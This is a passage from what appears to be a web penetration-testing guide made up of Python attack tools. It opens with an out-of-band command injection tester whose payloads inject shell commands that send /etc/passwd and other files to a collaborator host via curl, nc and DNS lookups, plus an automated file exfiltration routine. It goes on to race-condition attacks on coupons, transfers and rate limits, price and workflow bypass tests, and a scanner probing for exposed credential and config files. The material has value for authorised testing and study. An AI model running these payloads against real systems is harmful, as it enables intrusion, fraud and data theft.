        self.param_name = param_name
        self.collaborator = collaborator_url or self.setup_interactsh()
        self.session = requests.Session()
        
        # OOB payloads for different protocols
        self.oob_payloads = {
            'dns': [
                # DNS lookup
                '; nslookup $(whoami).{collaborator}',
                '| nslookup $(id).{collaborator}',
                '`nslookup $(hostname).{collaborator}`',
                
                # Dig
                '; dig $(cat /etc/passwd | base64).{collaborator}',
                '| dig $(uname -a | base64).{collaborator}',
                
                # Ping with DNS
                '; ping -c 1 $(whoami).{collaborator}',
            ],
            
            'http': [
                # Curl/wget
                '; curl http://{collaborator}/$(whoami)',
                '| wget http://{collaborator}/$(id)',
                '`curl http://{collaborator}/$(hostname)`',
                
                # With data exfiltration
                '; curl -X POST http://{collaborator} -d "$(cat /etc/passwd | base64)"',
                '| wget --post-data="$(uname -a)" http://{collaborator}',
                
                # Using netcat
                '; cat /etc/passwd | base64 | nc {collaborator} 80',
            ],
            
            'icmp': [
                # Ping with data in size
                '; ping -c 1 -s $(expr $(whoami | wc -c) + 8) {collaborator}',
                '| ping -c 1 -p $(printf "%x" $(id | sum | cut -f1 -d" ")) {collaborator}',
            ],
            
            'nslookup_python': [
                # Python one-liners
                '; python3 -c "import os; import socket; socket.gethostbyname(os.popen(\'whoami\').read().strip() + \'.{collaborator}\')"',
                '| python3 -c "import os; import urllib.request; urllib.request.urlopen(\'http://{collaborator}/\'.join(os.popen(\'id\').read()))"',
            ],
            
            'blind_with_delay': [
                # Time-based with DNS (will cause delay on DNS resolution failure)
                '; ping -c 1 $(whoami).{collaborator} || sleep 5',
                '| nslookup $(id).{collaborator} || sleep 5',
            ]
        }
    
    def setup_interactsh(self):
        """Set up InteractSH server for OOB testing"""
        try:
            # Start InteractSH client
            import tempfile
            import os
            
            # Create temporary directory for InteractSH
            temp_dir = tempfile.mkdtemp()
            client_path = os.path.join(temp_dir, 'interactsh-client')
            
            # Download interactsh-client if not exists
            # Note: In real use, you would have this pre-installed
            print("[*] Note: Install interactsh-client from https://github.com/projectdiscovery/interactsh")
            
            # For demo, we'll use a placeholder
            return "your-subdomain.interact.sh"
            
        except Exception as e:
            print(f"[-] InteractSH setup failed: {e}")
            return "attacker-controlled-domain.com"
    
    def monitor_interactions(self, duration=60):
        """Monitor for interactions with collaborator"""
        interactions = []
        
        # In real implementation, you would:
        # 1. Start InteractSH client
        # 2. Monitor for DNS/HTTP interactions
        # 3. Parse incoming data
        
        print(f"[*] Monitoring for interactions for {duration} seconds...")
        print("[*] In real scenario, this would connect to InteractSH server")
        
        # Simulated monitoring
        time.sleep(duration)
        
        # Return simulated interactions for demo
        simulated_interactions = [
            {
                'type': 'dns',
                'timestamp': time.time(),
                'data': 'root.d3b4a1c2.interact.sh',
                'protocol': 'DNS'
            },
            {
                'type': 'http',
                'timestamp': time.time() + 5,
                'data': 'GET /root HTTP/1.1',
                'protocol': 'HTTP'
            }
        ]
        
        return simulated_interactions
    
    def test_oob_injection(self):
        """Test for OOB command injection"""
        results = []
        
        # Start monitoring in background
        monitor_thread = threading.Thread(
            target=self.monitor_interactions,
            args=(120,)
        )
        monitor_thread.start()
        
        # Send payloads
        for protocol, payload_list in self.oob_payloads.items():
            print(f"[*] Testing {protocol} OOB payloads")
            
            for payload_template in payload_list[:3]:  # Test first 3
                payload = payload_template.format(collaborator=self.collaborator)
                encoded_payload = quote(payload)
                
                # Send request
                params = {self.param_name: payload}
                
                try:
                    response = self.session.get(
                        self.target_url,
                        params=params,
                        timeout=10
                    )
                    
                    results.append({
                        'protocol': protocol,
                        'payload': payload[:100],
                        'status_code': response.status_code,
                        'response_time': response.elapsed.total_seconds()
                    })
                    
                    print(f"  [+] Sent {protocol} payload: {payload[:50]}...")
                    
                except Exception as e:
                    results.append({
                        'protocol': protocol,
                        'payload': payload[:100],
                        'error': str(e)
                    })
                
                time.sleep(1)  # Rate limiting
        
        # Wait for monitoring to complete
        monitor_thread.join()
        
        # Get interactions
        interactions = self.monitor_interactions()
        
        return {
            'sent_payloads': results,
            'interactions': interactions,
            'oob_detected': len(interactions) > 0
        }
    
    def automated_data_exfiltration(self, file_path):
        """Automatically exfiltrate data using OOB"""
        # Generate payloads for data exfiltration
        exfiltration_methods = [
            # Base64 encoding via DNS
            f'; cat {file_path} | base64 | tr -d "\\n" | fold -w 63 | while read chunk; do nslookup $chunk.{{collaborator}}; done',
            
            # HTTP POST
            f'; curl -X POST http://{{collaborator}}/exfil -d "$(cat {file_path} | base64)"',
            
            # Using xxd for hex encoding
            f'; xxd -p {file_path} | tr -d "\\n" | fold -w 60 | while read chunk; do ping -c 1 $chunk.{{collaborator}}; done',
            
            # Python one-liner for large files
            f'; python3 -c "import urllib.request, base64; urllib.request.urlopen(\'http://{{collaborator}}/\' + base64.b64encode(open(\'{file_path}\', \'rb\').read()).decode())"',
        ]
        
        results = []
        
        for method in exfiltration_methods:
            payload = method.format(collaborator=self.collaborator)
            
            print(f"[*] Testing exfiltration: {payload[:80]}...")
            
            # Send payload
            params = {self.param_name: payload}
            
            try:
                response = self.session.get(
                    self.target_url,
                    params=params,
                    timeout=30
                )
                
                results.append({
                    'method': method[:50],
                    'status': 'sent',
                    'response_time': response.elapsed.total_seconds()
                })
                
            except Exception as e:
                results.append({
                    'method': method[:50],
                    'status': 'error',
                    'error': str(e)
                })
            
            time.sleep(2)
        
        # Monitor for incoming data
        print("[*] Monitoring for exfiltrated data...")
        time.sleep(30)
        
        # In real implementation, you would parse the received data
        # from your collaborator server
        
        return results

# Usage
oob_tester = OOBCommandInjector(
    "http://target.com/run",
    "cmd",
    collaborator="your-domain.interact.sh"
)

results = oob_tester.test_oob_injection()

if results['oob_detected']:
    print("[!] OOB Command Injection detected!")
    for interaction in results['interactions']:
        print(f"  [+] {interaction['protocol']}: {interaction['data']}")

Chapter 4: Insecure Design - Business Logic Flaws

4.1 Advanced Business Logic Testing

Race Condition Exploitation Framework

#!/usr/bin/env python3
"""
Advanced Race Condition Testing Framework
Tests for TOCTOU, limit bypass, and concurrency vulnerabilities
"""
import asyncio
import aiohttp
import time
from typing import List, Dict
import statistics

class RaceConditionTester:
    def __init__(self, target_url, session_cookies=None):
        self.target_url = target_url
        self.cookies = session_cookies or {}
        self.results = []
        
    async def send_concurrent_requests(self, 
                                     request_template, 
                                     concurrency=10, 
                                     total_requests=100):
        """Send concurrent requests to test for race conditions"""
        async with aiohttp.ClientSession(cookies=self.cookies) as session:
            tasks = []
            
            for i in range(total_requests):
                # Modify request if needed (e.g., different IDs)
                request = self.modify_request(request_template, i)
                task = self.send_request(session, request)
                tasks.append(task)
            
            # Send in batches for concurrency control
            responses = []
            for i in range(0, len(tasks), concurrency):
                batch = tasks[i:i+concurrency]
                batch_responses = await asyncio.gather(*batch, return_exceptions=True)
                responses.extend(batch_responses)
                
                # Small delay between batches
                await asyncio.sleep(0.1)
            
            return responses
    
    async def send_request(self, session, request):
        """Send individual request"""
        try:
            async with session.request(
                method=request['method'],
                url=request['url'],
                headers=request.get('headers', {}),
                data=request.get('data'),
                json=request.get('json')
            ) as response:
                return {
                    'status': response.status,
                    'text': await response.text(),
                    'headers': dict(response.headers)
                }
        except Exception as e:
            return {'error': str(e)}
    
    def modify_request(self, template, index):
        """Modify request template for testing"""
        request = template.copy()
        
        # Modify based on index
        if 'data' in request:
            # For form data
            if isinstance(request['data'], dict):
                # Add sequence number to avoid duplicates
                request['data'] = request['data'].copy()
                for key in request['data']:
                    if 'UNIQUE' in str(request['data'][key]):
                        request['data'][key] = request['data'][key].replace('UNIQUE', str(index))
        
        elif 'json' in request:
            # For JSON data
            if isinstance(request['json'], dict):
                request['json'] = request['json'].copy()
                # Modify JSON values
                import json
                json_str = json.dumps(request['json'])
                if 'UNIQUE' in json_str:
                    json_str = json_str.replace('UNIQUE', str(index))
                    request['json'] = json.loads(json_str)
        
        return request
    
    async def test_coupon_race(self, coupon_code, concurrency=20):
        """Test for coupon code race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/apply-coupon',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'coupon_code': coupon_code,
                'order_id': 'ORDER_UNIQUE'
            }
        }
        
        print(f"[*] Testing coupon code race: {coupon_code}")
        
        responses = await self.send_concurrent_requests(
            request_template, 
            concurrency=concurrency,
            total_requests=concurrency * 2
        )
        
        # Analyze responses
        success_count = 0
        error_count = 0
        
        for resp in responses:
            if isinstance(resp, dict):
                if resp.get('status') == 200:
                    success_count += 1
                else:
                    error_count += 1
        
        result = {
            'test': 'coupon_race',
            'coupon_code': coupon_code,
            'concurrency': concurrency,
            'success_count': success_count,
            'error_count': error_count,
            'vulnerable': success_count > 1  # Coupon used more than once
        }
        
        self.results.append(result)
        return result
    
    async def test_balance_transfer_race(self, from_account, to_account, amount, concurrency=15):
        """Test for balance transfer race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/transfer',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'from_account': from_account,
                'to_account': to_account,
                'amount': amount,
                'reference': 'REF_UNIQUE'
            }
        }
        
        print(f"[*] Testing balance transfer race: {amount} from {from_account}")
        
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )
        
        # Check for duplicate transfers
        successful_transfers = []
        
        for resp in responses:
            if isinstance(resp, dict) and resp.get('status') == 200:
                # Extract transfer ID from response
                try:
                    import json
                    data = json.loads(resp.get('text', '{}'))
                    if 'transfer_id' in data:
                        successful_transfers.append(data['transfer_id'])
                except:
                    successful_transfers.append('unknown')
        
        result = {
            'test': 'balance_transfer_race',
            'from_account': from_account,
            'to_account': to_account,
            'amount': amount,
            'concurrency': concurrency,
            'successful_transfers': len(successful_transfers),
            'unique_transfers': len(set(successful_transfers)),
            'vulnerable': len(successful_transfers) > 1 and len(set(successful_transfers)) > 1
        }
        
        self.results.append(result)
        return result
    
    async def test_inventory_race(self, product_id, quantity=1, concurrency=25):
        """Test for inventory race condition (TOCTOU)"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}/api/purchase',
            'headers': {'Content-Type': 'application/json'},
            'json': {
                'product_id': product_id,
                'quantity': quantity,
                'customer_id': 'CUST_UNIQUE'
            }
        }
        
        print(f"[*] Testing inventory race for product: {product_id}")
        
        responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency * 2
        )
        
        # Analyze inventory oversell
        successful_purchases = []
        
        for resp in responses:
            if isinstance(resp, dict) and resp.get('status') == 200:
                successful_purchases.append(1)
        
        result = {
            'test': 'inventory_race',
            'product_id': product_id,
            'quantity': quantity,
            'concurrency': concurrency,
            'successful_purchases': len(successful_purchases),
            'vulnerable': len(successful_purchases) > 10  # Arbitrary threshold
        }
        
        self.results.append(result)
        return result
    
    async def test_rate_limit_bypass(self, endpoint, concurrency=50):
        """Test for rate limit bypass via race condition"""
        request_template = {
            'method': 'POST',
            'url': f'{self.target_url}{endpoint}',
            'headers': {'Content-Type': 'application/json'},
            'json': {'action': 'test_UNIQUE'}
        }
        
        print(f"[*] Testing rate limit bypass: {endpoint}")
        
        # First, determine normal rate limit
        baseline_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=1,
            total_requests=5
        )
        
        # Then test with high concurrency
        attack_responses = await self.send_concurrent_requests(
            request_template,
            concurrency=concurrency,
            total_requests=concurrency
        )
        
        # Count successful responses
        baseline_success = sum(1 for r in baseline_responses 
                             if isinstance(r, dict) and r.get('status') == 200)
        
        attack_success = sum(1 for r in attack_responses 
                           if isinstance(r, dict) and r.get('status') == 200)
        
        result = {
            'test': 'rate_limit_bypass',
            'endpoint': endpoint,
            'concurrency': concurrency,
            'baseline_success': baseline_success,
            'attack_success': attack_success,
            'vulnerable': attack_success > baseline_success * 2
        }
        
        self.results.append(result)
        return result
    
    async def run_all_tests(self):
        """Run all race condition tests"""
        tests = [
            self.test_coupon_race("WELCOME2024", 20),
            self.test_balance_transfer_race("ACC123", "ACC456", 100, 15),
            self.test_inventory_race("PROD789", 1, 25),
            self.test_rate_limit_bypass("/api/reset-password", 50)
        ]
        
        results = await asyncio.gather(*tests)
        
        # Generate report
        report = {
            'summary': {
                'total_tests': len(results),
                'vulnerable_tests': sum(1 for r in results if r.get('vulnerable')),
                'tests_run': [r.get('test') for r in results]
            },
            'detailed_results': results
        }
        
        return report

# Usage
async def main():
    tester = RaceConditionTester(
        "http://target.com",
        session_cookies={"SESSION": "your_session_id"}
    )
    
    report = await tester.run_all_tests()
    
    print("\n" + "="*60)
    print("RACE CONDITION TEST REPORT")
    print("="*60)
    
    for result in report['detailed_results']:
        status = "VULNERABLE" if result.get('vulnerable') else "SAFE"
        print(f"\n[{status}] {result['test']}")
        print(f"  Details: {result}")

# Run the test
import asyncio
asyncio.run(main())

Workflow Bypass Detection

#!/usr/bin/env python3
"""
Workflow Bypass and State Transition Testing
Tests for skipped steps, unauthorized state changes, and business logic flaws
"""
import requests
import json
from urllib.parse import urljoin

class WorkflowBypassTester:
    def __init__(self, base_url, auth_token=None):
        self.base_url = base_url
        self.session = requests.Session()
        if auth_token:
            self.session.headers.update({'Authorization': f'Bearer {auth_token}'})
        
        # Common workflow patterns to test
        self.workflow_patterns = {
            'checkout': ['cart', 'shipping', 'payment', 'confirmation'],
            'registration': ['start', 'verify_email', 'set_password', 'complete'],
            'password_reset': ['request', 'verify_token', 'set_new', 'complete'],
            'kyc': ['personal_info', 'document_upload', 'verification', 'approved']
        }
    
    def test_step_skipping(self, workflow_type, steps):
        """Test if workflow steps can be skipped"""
        vulnerabilities = []
        
        # Create a map of step endpoints
        step_endpoints = self.discover_workflow_endpoints(workflow_type)
        
        if not step_endpoints:
            print(f"[-] Could not discover endpoints for {workflow_type}")
            return vulnerabilities
        
        # Test skipping from first to last step
        if len(step_endpoints) >= 3:
            first_step = step_endpoints[0]
            last_step = step_endpoints[-1]
            
            print(f"[*] Testing step skipping: {first_step} -> {last_step}")
            
            # Try to access last step without completing first
            response = self.session.get(urljoin(self.base_url, last_step))
            
            if response.status_code == 200:
                # Check if it actually worked (not just showing error page)
                if not self.is_error_page(response.text):
                    vulnerabilities.append({
                        'type': 'step_skipping',
                        'workflow': workflow_type,
                        'from_step': first_step,
                        'to_step': last_step,
                        'status_code': response.status_code,
                        'evidence': response.text[:200]
                    })
        
        # Test skipping intermediate steps
        for i in range(len(step_endpoints) - 2):
            for j in range(i + 2, len(step_endpoints)):
                step_a = step_endpoints[i]
                step_b = step_endpoints[j]
                
                # Complete step A
                self.complete_step(step_a)
                
                # Try to access step B directly
                response = self.session.get(urljoin(self.base_url, step_b))
                
                if response.status_code == 200 and not self.is_error_page(response.text):
                    vulnerabilities.append({
                        'type': 'intermediate_step_skip',
                        'workflow': workflow_type,
                        'skipped_steps': step_endpoints[i+1:j],
                        'status_code': response.status_code
                    })
        
        return vulnerabilities
    
    def test_state_manipulation(self, workflow_type):
        """Test if workflow state can be manipulated"""
        vulnerabilities = []
        
        # Discover state parameters
        state_params = self.discover_state_parameters(workflow_type)
        
        for param, values in state_params.items():
            # Try to set unauthorized states
            for target_state in ['approved', 'completed', 'verified', 'paid']:
                if target_state not in values:  # Not a normal state
                    # Try to set this state
                    payload = {param: target_state}
                    
                    response = self.session.post(
                        urljoin(self.base_url, f'/api/{workflow_type}/update'),
                        json=payload
                    )
                    
                    if response.status_code == 200:
                        # Verify state was actually changed
                        check_response = self.session.get(
                            urljoin(self.base_url, f'/api/{workflow_type}/status')
                        )
                        
                        if target_state in check_response.text:
                            vulnerabilities.append({
                                'type': 'state_manipulation',
                                'workflow': workflow_type,
                                'parameter': param,
                                'unauthorized_state': target_state,
                                'evidence': check_response.text[:200]
                            })
        
        return vulnerabilities
    
    def test_parallel_workflows(self):
        """Test for parallel workflow execution issues"""
        vulnerabilities = []
        
        workflows = ['checkout', 'kyc', 'registration']
        
        for workflow in workflows:
            # Start two instances of the same workflow
            instance1_id = self.start_workflow(workflow)
            instance2_id = self.start_workflow(workflow)
            
            if instance1_id and instance2_id:
                # Try to mix data between workflows
                mix_payload = {
                    'workflow_id': instance1_id,
                    'data': {'from_instance': instance2_id}
                }
                
                response = self.session.post(
                    urljoin(self.base_url, f'/api/{workflow}/update'),
                    json=mix_payload
                )
                
                if response.status_code == 200:
                    vulnerabilities.append({
                        'type': 'parallel_workflow_mixing',
                        'workflow': workflow,
                        'instance1': instance1_id,
                        'instance2': instance2_id,
                        'evidence': response.text[:200]
                    })
        
        return vulnerabilities
    
    def test_business_constraint_bypass(self):
        """Test for business constraint bypasses"""
        vulnerabilities = []
        
        # Test 1: Negative quantities
        test_cases = [
            {'item': 'PROD001', 'quantity': -1, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 0, 'expected': 'error'},
            {'item': 'PROD001', 'quantity': 999999, 'expected': 'error'},  # Too large
            {'item': 'PROD001', 'quantity': 1.5, 'expected': 'error'},  # Fractional
        ]
        
        for test in test_cases:
            response = self.session.post(
                urljoin(self.base_url, '/api/cart/add'),
                json=test
            )
            
            if response.status_code == 200 and test['expected'] == 'error':
                vulnerabilities.append({
                    'type': 'quantity_constraint_bypass',
                    'test_case': test,
                    'status_code': response.status_code,
                    'response': response.text[:200]
                })
        
        # Test 2: Price manipulation
        price_tests = [
            {'item': 'PROD001', 'price': 0.01},  # Lower than actual
            {'item': 'PROD001', 'price': -10},   # Negative price
            {'item': 'PROD001', 'price': 1e10},  # Very high price
        ]
        
        for test in price_tests:
            response = self.session.post(
                urljoin(self.base_url, '/api/checkout'),
                json=test
            )
            
            if response.status_code == 200:
                # Check if order was created with manipulated price
                order_response = self.session.get(
                    urljoin(self.base_url, '/api/orders/latest')
                )
                
                if str(test['price']) in order_response.text:
                    vulnerabilities.append({
                        'type': 'price_manipulation',
                        'test_case': test,
                        'order_details': order_response.text[:200]
                    })
        
        # Test 3: Discount stacking
        discount_tests = [
            {'coupons': ['SAVE10', 'SAVE20', 'SAVE30']},  # Multiple coupons
            {'coupons': ['SAVE10'] * 5},  # Same coupon multiple times
        ]
        
        for test in discount_tests:
            for coupon in test['coupons']:
                self.session.post(
                    urljoin(self.base_url, '/api/apply-coupon'),
                    json={'coupon': coupon}
                )
            
            # Check final price
            response = self.session.get(
                urljoin(self.base_url, '/api/cart/total')
            )
            
            try:
                total = json.loads(response.text).get('total', 0)
                if total < 0:  # Negative total
                    vulnerabilities.append({
                        'type': 'discount_stacking',
                        'coupons': test['coupons'],
                        'final_total': total
                    })
            except:
                pass
        
        return vulnerabilities
    
    def discover_workflow_endpoints(self, workflow_type):
        """Discover endpoints for a given workflow"""
        endpoints = []
        
        # Common endpoint patterns
        patterns = [
            f'/api/{workflow_type}/{{step}}',
            f'/{workflow_type}/{{step}}',
            f'/app/{workflow_type}/{{step}}',
        ]
        
        # Common step names
        step_names = ['start', 'create', 'step1', 'step2', 'step3', 
                     'review', 'confirm', 'complete', 'finish']
        
        for pattern in patterns:
            for step in step_names:
                endpoint = pattern.format(step=step)
                response = self.session.head(urljoin(self.base_url, endpoint))
                
                if response.status_code != 404:
                    endpoints.append(endpoint)
        
        return sorted(set(endpoints))
    
    def is_error_page(self, html):
        """Check if page is an error page"""
        error_indicators = [
            'error', 'invalid', 'not found', '404', '403',
            'forbidden', 'unauthorized', 'access denied'
        ]
        
        html_lower = html.lower()
        return any(indicator in html_lower for indicator in error_indicators)

# Usage
tester = WorkflowBypassTester(
    "http://target.com",
    auth_token="your_auth_token"
)

# Run tests
step_skip_vulns = tester.test_step_skipping('checkout', [])
state_vulns = tester.test_state_manipulation('kyc')
parallel_vulns = tester.test_parallel_workflows()
constraint_vulns = tester.test_business_constraint_bypass()

all_vulns = step_skip_vulns + state_vulns + parallel_vulns + constraint_vulns

print(f"\n[+] Found {len(all_vulns)} workflow bypass vulnerabilities:")
for vuln in all_vulns:
    print(f"  - {vuln['type']}: {vuln.get('evidence', 'No details')[:100]}")

Chapter 5: Security Misconfiguration - Beyond Default Configs

5.1 Comprehensive Configuration Scanning

Automated Misconfiguration Detection Framework

#!/usr/bin/env python3
"""
Advanced Security Misconfiguration Scanner
Covers web servers, application frameworks, cloud services, and containers
"""
import requests
import yaml
import json
import socket
import ssl
from typing import Dict, List
import concurrent.futures

class SecurityMisconfigScanner:
    def __init__(self, target_url):
        self.target_url = target_url
        self.session = requests.Session()
        self.session.headers.update({
            'User-Agent': 'SecurityScanner/1.0'
        })
        self.findings = []
    
    def scan_web_server(self):
        """Scan web server configurations"""
        server_findings = []
        
        # 1. Check HTTP methods
        methods = ['GET', 'POST', 'PUT', 'DELETE', 'PATCH', 'OPTIONS', 'TRACE', 'CONNECT']
        for method in methods:
            try:
                response = self.session.request(method, self.target_url, timeout=5)
                if response.status_code not in [405, 501]:  # Method not allowed/implemented
                    server_findings.append({
                        'category': 'HTTP Methods',
                        'issue': f'Potentially dangerous method {method} enabled',
                        'severity': 'MEDIUM',
                        'evidence': f'HTTP {method} returns {response.status_code}'
                    })
            except:
                pass
        
        # 2. Check HTTP headers
        response = self.session.get(self.target_url)
        headers = response.headers
        
        # Security headers check
        security_headers = {
            'Strict-Transport-Security': 'HIGH',
            'Content-Security-Policy': 'MEDIUM',
            'X-Frame-Options': 'MEDIUM',
            'X-Content-Type-Options': 'LOW',
            'Referrer-Policy': 'LOW',
            'Permissions-Policy': 'MEDIUM'
        }
        
        for header, severity in security_headers.items():
            if header not in headers:
                server_findings.append({
                    'category': 'Security Headers',
                    'issue': f'Missing security header: {header}',
                    'severity': severity,
                    'evidence': 'Header not present in response'
                })
        
        # 3. Check for server information leakage
        server_header = headers.get('Server', '')
        x_powered_by = headers.get('X-Powered-By', '')
        
        if server_header:
            server_findings.append({
                'category': 'Information Disclosure',
                'issue': f'Server version disclosed: {server_header}',
                'severity': 'LOW',
                'evidence': f'Server: {server_header}'
            })
        
        if x_powered_by:
            server_findings.append({
                'category': 'Information Disclosure',
                'issue': f'Technology stack disclosed: {x_powered_by}',
                'severity': 'LOW',
                'evidence': f'X-Powered-By: {x_powered_by}'
            })
        
        # 4. Check for directory listing
        test_dirs = ['/static/', '/uploads/', '/images/', '/files/', '/assets/']
        for directory in test_dirs:
            test_url = self.target_url.rstrip('/') + directory
            try:
                response = self.session.get(test_url, timeout=5)
                if '<title>Index of' in response.text or '<h1>Index of' in response.text:
                    server_findings.append({
                        'category': 'Directory Listing',
                        'issue': f'Directory listing enabled at {directory}',
                        'severity': 'MEDIUM',
                        'evidence': f'Directory index page accessible at {test_url}'
                    })
            except:
                pass
        
        return server_findings
    
    def scan_framework_config(self):
        """Scan framework-specific misconfigurations"""
        framework_findings = []
        
        # Detect framework
        framework = self.detect_framework()
        
        if framework == 'django':
            # Django-specific checks
            test_paths = [
                '/admin',  # Django admin
                '/admin/login',
                '/static/admin',
                '/debug',  # Django debug toolbar
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if 'Django' in response.text:
                        if path == '/admin':
                            framework_findings.append({
                                'category': 'Django',
                                'issue': 'Django admin interface accessible',
                                'severity': 'HIGH' if 'login' not in response.text else 'MEDIUM',
                                'evidence': f'Admin interface at {test_url}'
                            })
                        elif 'debug' in path:
                            framework_findings.append({
                                'category': 'Django',
                                'issue': 'Django debug mode might be enabled',
                                'severity': 'HIGH',
                                'evidence': f'Debug interface at {test_url}'
                            })
        
        elif framework == 'laravel':
            # Laravel-specific checks
            test_paths = [
                '/.env',
                '/storage/logs/laravel.log',
                '/vendor/',
                '/config/',
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if path == '/.env':
                        framework_findings.append({
                            'category': 'Laravel',
                            'issue': '.env file accessible',
                            'severity': 'CRITICAL',
                            'evidence': f'Environment file exposed at {test_url}'
                        })
                    elif 'vendor' in path:
                        framework_findings.append({
                            'category': 'Laravel',
                            'issue': 'Vendor directory accessible',
                            'severity': 'HIGH',
                            'evidence': f'Vendor directory at {test_url}'
                        })
        
        elif framework == 'rails':
            # Ruby on Rails checks
            test_paths = [
                '/rails/info/properties',
                '/rails/mailers',
                '/assets/',
                '/system/',
            ]
            
            for path in test_paths:
                test_url = self.target_url.rstrip('/') + path
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    if 'rails' in path:
                        framework_findings.append({
                            'category': 'Rails',
                            'issue': 'Rails information pages accessible',
                            'severity': 'HIGH',
                            'evidence': f'Rails info at {test_url}'
                        })
        
        return framework_findings
    
    def scan_cloud_misconfig(self):
        """Scan for cloud service misconfigurations"""
        cloud_findings = []
        
        # Check for cloud metadata endpoints (from SSRF perspective)
        metadata_endpoints = [
            'http://169.254.169.254/latest/meta-data/',
            'http://metadata.google.internal/computeMetadata/v1/',
            'http://169.254.169.254/metadata/instance',
            'http://100.100.100.200/latest/meta-data/',  # Alibaba Cloud
        ]
        
        # Check for exposed S3/GCP buckets
        bucket_patterns = [
            's3.amazonaws.com',
            'storage.googleapis.com',
            'blob.core.windows.net',
            'digitaloceanspaces.com'
        ]
        
        # Scan for cloud-specific files
        cloud_files = [
            '/.aws/credentials',
            '/.config/gcloud/credentials',
            '/.azure/credentials',
            '/.kube/config'
        ]
        
        # Check response for cloud indicators
        response = self.session.get(self.target_url)
        html = response.text
        
        for pattern in bucket_patterns:
            if pattern in html:
                cloud_findings.append({
                    'category': 'Cloud Storage',
                    'issue': f'Cloud storage URL found: {pattern}',
                    'severity': 'MEDIUM',
                    'evidence': f'Found reference to {pattern} in page source'
                })
        
        # Check for cloud metadata in comments
        import re
        cloud_keys = re.findall(r'(AKIA[0-9A-Z]{16})|(gh[oprstu]_[0-9a-zA-Z]{36})', html)
        if cloud_keys:
            cloud_findings.append({
                'category': 'Cloud Credentials',
                'issue': 'Potential cloud credentials found in page source',
                'severity': 'CRITICAL',
                'evidence': f'Found {len(cloud_keys)} potential credential patterns'
            })
        
        return cloud_findings
    
    def scan_container_misconfig(self):
        """Scan for container and orchestration misconfigurations"""
        container_findings = []
        
        # Kubernetes/Docker exposed endpoints
        container_endpoints = [
            '/docker.sock',
            '/var/run/docker.sock',
            '/kubelet',
            '/metrics',
            '/healthz',
            '/readyz',
            '/debug/pprof/',
            '/debug/vars',
            '/api/v1/namespaces',
            '/apis/apps/v1/deployments',
        ]
        
        for endpoint in container_endpoints:
            test_url = self.target_url.rstrip('/') + endpoint
            try:
                response = self.session.get(test_url, timeout=5)
                
                if response.status_code == 200:
                    # Check response content for container indicators
                    if any(indicator in response.text.lower() 
                          for indicator in ['docker', 'kubernetes', 'k8s', 'pod', 'container']):
                        container_findings.append({
                            'category': 'Container Exposure',
                            'issue': f'Container/orchestration endpoint exposed: {endpoint}',
                            'severity': 'CRITICAL',
                            'evidence': f'Endpoint accessible at {test_url}'
                        })
            except:
                pass
        
        # Check for Docker/K8s configuration files
        config_files = [
            '/.docker/config.json',
            '/.kube/config',
            '/etc/kubernetes/admin.conf',
            '/var/lib/kubelet/config.yaml'
        ]
        
        for config_file in config_files:
            test_url = self.target_url.rstrip('/') + config_file
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                container_findings.append({
                    'category': 'Container Config',
                    'issue': f'Container configuration file exposed: {config_file}',
                    'severity': 'CRITICAL',
                    'evidence': f'Config file accessible at {test_url}'
                })
        
        return container_findings
    
    def scan_application_misconfig(self):
        """Scan for application-level misconfigurations"""
        app_findings = []
        
        # 1. Check for debug modes
        debug_indicators = [
            ('/debug', 'Debug interface'),
            ('/phpinfo', 'PHPInfo'),
            ('/actuator', 'Spring Boot Actuator'),
            ('/_debug', 'Debug endpoint'),
            ('/console', 'Debug console'),
        ]
        
        for endpoint, description in debug_indicators:
            test_url = self.target_url.rstrip('/') + endpoint
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                app_findings.append({
                    'category': 'Debug Mode',
                    'issue': f'{description} accessible',
                    'severity': 'HIGH',
                    'evidence': f'{description} at {test_url}'
                })
        
        # 2. Check for configuration files
        config_files = [
            ('.env', 'Environment file'),
            ('.env.example', 'Example environment file'),
            ('config.xml', 'XML configuration'),
            ('config.json', 'JSON configuration'),
            ('settings.py', 'Python settings'),
            ('application.yml', 'YAML configuration'),
            ('web.config', 'ASP.NET config'),
            ('.htaccess', 'Apache config'),
            ('.git/config', 'Git config'),
        ]
        
        for filename, description in config_files:
            test_url = self.target_url.rstrip('/') + '/' + filename
            response = self.session.get(test_url)
            
            if response.status_code == 200:
                app_findings.append({
                    'category': 'Config File Exposure',
                    'issue': f'{description} exposed',
                    'severity': 'MEDIUM' if 'example' in filename else 'HIGH',
                    'evidence': f'{description} at {test_url}'
                })
        
        # 3. Check for backup files
        backup_patterns = [
            '.bak', '.backup', '.old', '.orig', '.save',
            '_backup', '-backup', '.temp', '.tmp', '.swp'
        ]
        
        # Test common files with backup extensions
        common_files = ['index', 'main', 'app', 'config', 'database', 'settings']
        
        for base_file in common_files:
            for ext in backup_patterns:
                test_url = self.target_url.rstrip('/') + '/' + base_file + ext
                response = self.session.get(test_url)
                
                if response.status_code == 200:
                    app_findings.append({
                        'category': 'Backup Files',
                        'issue': f'Backup file exposed: {base_file}{ext}',
                        'severity': 'MEDIUM',
                        'evidence': f'Backup file at {test_url}'
                    })
        
        return app_findings
    
    def detect_framework(self):
        """Detect web application framework"""
        response = self.session.get(self.target_url)
        html = response.text
        headers = response.headers
        
        # Check headers
        server = headers.get('Server', '').lower()
        powered_by = headers.get('X-Powered-By', '').lower()
        
        # Check HTML patterns
        if 'django' in html.lower() or 'csrfmiddlewaretoken' in html:
            return 'django'
        elif 'laravel' in html.lower() or '/vendor/laravel/' in html:
            return 'laravel'
        elif 'rails' in server or 'rails' in powered_by:
            return 'rails'
        elif 'spring' in html.lower() or 'spring' in server:
            return 'spring'
